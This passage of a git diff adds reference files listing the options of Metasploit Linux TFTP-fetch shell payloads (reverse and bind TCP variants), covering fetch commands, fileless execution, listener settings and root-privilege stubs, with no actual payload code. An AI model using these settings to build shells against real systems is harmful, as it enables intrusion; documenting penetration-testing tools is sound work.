(includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG gGSx yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..6e12670 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_ipv6_tcp.txt 
@@ -0,0 +1,101 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/tftp/x86/shell/reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QYvDTmdcwE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). 
+ + Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) 
+ PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_nonx_tcp.txt new file mode 100644 index 0000000..a4994dc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_nonx_tcp.txt 
@@ -0,0 +1,99 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/shell/reverse_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME daKjVXOT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). 
+ + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + 
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp.txt new file mode 100644 index 0000000..a56d3e8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp.txt 
@@ -0,0 +1,101 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME rabuVYEnm no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). 
+ + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + 
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp_uuid.txt new file mode 100644 index 0000000..8dfc7d9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp_uuid.txt 
@@ -0,0 +1,101 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/shell/reverse_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AhCpRSioMAD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). 
+ + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + 
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..8987d03 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_ipv6_tcp.txt 
@@ -0,0 +1,80 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/tftp/x86/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME hwYbkpfki no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Listen for a connection over IPv6 and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no 
Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp.txt new file mode 100644 index 0000000..d4eb7fd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp.txt 
@@ -0,0 +1,80 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/x86/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JLfklCuZVxH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system 
call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..de4ab7f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp_random_port.txt 
@@ -0,0 +1,77 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/tftp/x86/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Geyslan G. Bem + Aleh Boitsau + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vACfbeFDF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + 